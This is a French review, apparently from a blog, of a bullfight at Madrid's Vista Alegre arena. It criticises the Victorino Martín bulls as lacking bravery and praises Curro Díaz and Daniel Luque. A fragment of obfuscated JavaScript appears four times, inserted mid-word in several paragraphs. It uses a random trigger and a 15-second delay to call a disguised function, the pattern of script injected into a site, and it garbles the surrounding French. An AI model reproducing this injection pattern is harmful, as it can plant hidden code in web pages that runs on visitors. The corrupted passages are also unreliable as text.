MADRID ARENES DE VISTA ALEGRE : MEILLEURS LES TOREROS QUE LES TOROS

Promptitude : bravoure où le taureau charge le leurre du début à la fin. Avec hargne ou élégance, agressivité ou noblesse, mais sans cesser de le faire. Conclusion : les toros de Victorino Martín ne furent pas braves. Ils allaient vers les leurres mais renonçaient avant que les toreros n’aient fini leurs passes et eux leurs charges. Observations : le meilleur fut le quatrième, qui chargea avec de la classe pendant deux minutes (la série initiale) ; le pire, le cinquième, qui s’arrêtait avant d’avoir passé le corps du torero. Nuances : tous les toros, bien présentés mais excessivement hauts, furent injustement applaudis à l’arrastre, à l’exception du cinquième, justement sifflé.

Emilio de Justo les plaça loin au cheval, ce qui intéressa le public et ennuya l’aficionado : leur bravoure incertaine demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andait une distance plus proche.

Curro Díaz toréa en premier. J’ai noté de bonnes véroniques à son premier et une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande faena à son second, où il dessina une demi-douzaine de passes qui furent de véritables affiches de corrida. Il en tira tout le profit quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and le taureau chargeait et quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il cessa de le faire avec allant, il enchaîna des passes de muleta complètes au diapason des charges de plus en plus courtes. Génial. Il coupa une oreille méritée.

Daniel Luque, qui eut la malchance de tomber sur deux toros très effacés, parvint à extraire, je ne sais comment, une magnifique série de naturelles, le summum de l’après-midi. Avant et à la suite de ce moment au zénith, la nullité de ses deux toros s’imposa, ils refusèrent de charger.

Emilio de Justo se montra vaillant et avec de l’entrain devant son premier, qui se déplaçait mais ne chargeait pas, et auquel il coupa une oreille, et décidé face à son second, sans charge et immobile.

Il public, qui remplit plus d’une demie arène, passa un bon moment.

Les commentaires sont fermés.